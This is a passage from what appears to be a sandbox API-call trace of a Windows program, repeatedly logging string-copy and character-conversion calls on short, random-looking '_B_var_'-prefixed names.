CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_UCXAAXBA") returned 16 [0069.908] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82f12 | out: _Dst=0x144ec0) returned 0x0 [0069.908] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="kok1AAAU" | out: _Dst="kok1AAAU") returned 0x0 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="kok1AAAU") returned 9 [0069.908] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82ee6 | out: _Dst=0x68767a0) returned 0x0 [0069.908] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_kok1AAAU" | out: _Dst="_B_var_kok1AAAU") returned 0x0 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_kok1AAAU") returned 16 [0069.908] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82ee6 | out: _Dst=0x144ec0) returned 0x0 [0069.908] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="XAQxAA" | out: _Dst="XAQxAA") returned 0x0 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="XAQxAA") returned 7 [0069.908] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82f3e | out: _Dst=0x68767a0) returned 0x0 [0069.908] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_XAQxAA" | out: _Dst="_B_var_XAQxAA") returned 0x0 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_XAQxAA") returned 14 [0069.908] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82f3e | out: _Dst=0x144ec0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="kcDDQkA" | out: _Dst="kcDDQkA") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="kcDDQkA") returned 8 [0069.909] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82f66 | out: _Dst=0x68767a0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_kcDDQkA" | out: _Dst="_B_var_kcDDQkA") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_kcDDQkA") returned 15 [0069.909] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82f66 | out: _Dst=0x144ec0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="FUAUABGA" | out: _Dst="FUAUABGA") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="FUAUABGA") returned 9 [0069.909] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82fb6 | out: _Dst=0x68767a0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_FUAUABGA" | out: _Dst="_B_var_FUAUABGA") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_FUAUABGA") returned 16 [0069.909] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82fb6 | out: _Dst=0x144ec0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zAAAZAc" | out: _Dst="zAAAZAc") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zAAAZAc") returned 8 [0069.909] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82f8e | out: _Dst=0x68767a0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zAAAZAc" | out: _Dst="_B_var_zAAAZAc") returned 0x0 [0069.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zAAAZAc") returned 15 [0069.909] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82f8e | out: _Dst=0x144ec0) returned 0x0 [0069.909] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jDADUAAX" | out: _Dst="jDADUAAX") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jDADUAAX") returned 9 [0069.910] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b9001e | out: _Dst=0x68767a0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jDADUAAX" | out: _Dst="_B_var_jDADUAAX") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jDADUAAX") returned 16 [0069.910] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b9001e | out: _Dst=0x144ec0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="qU4QwkU" | out: _Dst="qU4QwkU") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="qU4QwkU") returned 8 [0069.910] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9004a | out: _Dst=0x68767a0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_qU4QwkU" | out: _Dst="_B_var_qU4QwkU") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_qU4QwkU") returned 15 [0069.910] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9004a | out: _Dst=0x144ec0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="bAAAQwZ" | out: _Dst="bAAAQwZ") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="bAAAQwZ") returned 8 [0069.910] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b90072 | out: _Dst=0x68767a0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_bAAAQwZ" | out: _Dst="_B_var_bAAAQwZ") returned 0x0 [0069.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_bAAAQwZ") returned 15 [0069.910] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b90072 | out: _Dst=0x144ec0) returned 0x0 [0069.910] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="BUwGxB" | out: _Dst="BUwGxB") returned 0x0 [0069.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="BUwGxB") returned 7 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b9009a | out: _Dst=0x68767a0) returned 0x0 [0069.911] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_BUwGxB" | out: _Dst="_B_var_BUwGxB") returned 0x0 [0069.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_BUwGxB") returned 14 [0069.911] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b9009a | out: _Dst=0x144ec0) returned 0x0 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.911] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="GAGwD1A4" | out: _Dst="GAGwD1A4") returned 0x0 [0069.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="GAGwD1A4") returned 9 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82fe2 | out: _Dst=0x68767a0) returned 0x0 [0069.911] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_GAGwD1A4" | out: _Dst="_B_var_GAGwD1A4") returned 0x0 [0069.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_GAGwD1A4") returned 16 [0069.911] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82fe2 | out: _Dst=0x144ec0) returned 0x0 [0069.911] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wBDDDAAQ" | out: _Dst="wBDDDAAQ") returned 0x0 [0069.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wBDDDAAQ") returned 9 [0069.911] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b900ea | out: _Dst=0x68767a0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wBDDDAAQ" | out: _Dst="_B_var_wBDDDAAQ") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wBDDDAAQ") returned 16 [0069.912] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b900ea | out: _Dst=0x144ec0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="hQAADA" | out: _Dst="hQAADA") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="hQAADA") returned 7 [0069.912] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b900c2 | out: _Dst=0x68767a0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_hQAADA" | out: _Dst="_B_var_hQAADA") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_hQAADA") returned 14 [0069.912] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b900c2 | out: _Dst=0x144ec0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="CowAkACA" | out: _Dst="CowAkACA") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="CowAkACA") returned 9 [0069.912] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b90116 | out: _Dst=0x68767a0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_CowAkACA" | out: _Dst="_B_var_CowAkACA") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_CowAkACA") returned 16 [0069.912] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b90116 | out: _Dst=0x144ec0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="mQQUAAAc" | out: _Dst="mQQUAAAc") returned 0x0 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="mQQUAAAc") returned 9 [0069.912] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b90142 | out: _Dst=0x68767a0) returned 0x0 [0069.912] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_mQQUAAAc" | out: _Dst="_B_var_mQQUAAAc") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_mQQUAAAc") returned 16 [0069.913] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b90142 | out: _Dst=0x144ec0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="cUDAAxZ" | out: _Dst="cUDAAxZ") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="cUDAAxZ") returned 8 [0069.913] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9019a | out: _Dst=0x68767a0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_cUDAAxZ" | out: _Dst="_B_var_cUDAAxZ") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_cUDAAxZ") returned 15 [0069.913] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9019a | out: _Dst=0x144ec0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wcAkAAAZ" | out: _Dst="wcAkAAAZ") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wcAkAAAZ") returned 9 [0069.913] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b9016e | out: _Dst=0x68767a0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wcAkAAAZ" | out: _Dst="_B_var_wcAkAAAZ") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wcAkAAAZ") returned 16 [0069.913] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b9016e | out: _Dst=0x144ec0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="oDA4AAAk" | out: _Dst="oDA4AAAk") returned 0x0 [0069.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="oDA4AAAk") returned 9 [0069.913] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b901ee | out: _Dst=0x68767a0) returned 0x0 [0069.913] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_oDA4AAAk" | out: _Dst="_B_var_oDA4AAAk") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_oDA4AAAk") returned 16 [0069.914] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b901ee | out: _Dst=0x144ec0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="JUGD1QA" | out: _Dst="JUGD1QA") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="JUGD1QA") returned 8 [0069.914] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9021a | out: _Dst=0x68767a0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_JUGD1QA" | out: _Dst="_B_var_JUGD1QA") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_JUGD1QA") returned 15 [0069.914] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9021a | out: _Dst=0x144ec0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="sDoAAAw" | out: _Dst="sDoAAAw") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="sDoAAAw") returned 8 [0069.914] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b90242 | out: _Dst=0x68767a0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_sDoAAAw" | out: _Dst="_B_var_sDoAAAw") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_sDoAAAw") returned 15 [0069.914] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b90242 | out: _Dst=0x144ec0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KkQAA4A" | out: _Dst="KkQAA4A") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KkQAA4A") returned 8 [0069.914] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9026a | out: _Dst=0x68767a0) returned 0x0 [0069.914] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KkQAA4A" | out: _Dst="_B_var_KkQAA4A") returned 0x0 [0069.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KkQAA4A") returned 15 [0069.915] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9026a | out: _Dst=0x144ec0) returned 0x0 [0069.915] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x68767a0) returned 0x0 [0069.915] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.915] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x68767a0) returned 0x0 [0069.915] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wBDGDXBA" | out: _Dst="wBDGDXBA") returned 0x0 [0069.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wBDGDXBA") returned 9 [0069.915] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b901c2 | out: _Dst=0x68767a0) returned 0x0 [0069.915] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wBDGDXBA" | out: _Dst="_B_var_wBDGDXBA") returned 0x0 [0069.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wBDGDXBA") returned 16 [0069.915] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b901c2 | out: _Dst=0x144ec0) returned 0x0 [0069.915] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="n_XAA4B4" | out: _Dst="n_XAA4B4") returned 0x0 [0069.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="n_XAA4B4") returned 9 [0069.915] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b902ba | out: _Dst=0x68767a0) returned 0x0 [0069.915] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_n_XAA4B4" | out: _Dst="_B_var_n_XAA4B4") returned 0x0 [0069.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_n_XAA4B4") returned 16 [0069.915] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b902ba | out: _Dst=0x144ec0) returned 0x0 [0069.915] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="uAAUXX" | out: _Dst="uAAUXX") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="uAAUXX") returned 7 [0069.916] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b90292 | out: _Dst=0x68767a0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_uAAUXX" | out: _Dst="_B_var_uAAUXX") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_uAAUXX") returned 14 [0069.916] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b90292 | out: _Dst=0x144ec0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="FBAXAQ" | out: _Dst="FBAXAQ") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="FBAXAQ") returned 7 [0069.916] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b902e6 | out: _Dst=0x68767a0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_FBAXAQ" | out: _Dst="_B_var_FBAXAQ") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_FBAXAQ") returned 14 [0069.916] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b902e6 | out: _Dst=0x144ec0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="XcBDoAA" | out: _Dst="XcBDoAA") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="XcBDoAA") returned 8 [0069.916] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b9030e | out: _Dst=0x68767a0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_XcBDoAA" | out: _Dst="_B_var_XcBDoAA") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_XcBDoAA") returned 15 [0069.916] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b9030e | out: _Dst=0x144ec0) returned 0x0 [0069.916] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="vQAUkA" | out: _Dst="vQAUkA") returned 0x0 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="vQAUkA") returned 7 [0069.917] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b90336 | out: _Dst=0x68767a0) returned 0x0 [0069.917] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_vQAUkA" | out: _Dst="_B_var_vQAUkA") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_vQAUkA") returned 14 [0069.917] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b90336 | out: _Dst=0x144ec0) returned 0x0 [0069.917] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="QACwAA" | out: _Dst="QACwAA") returned 0x0 [0069.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="QACwAA") returned 7 [0069.917] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b90386 | out: _Dst=0x68767a0) returned 0x0 [0069.917] 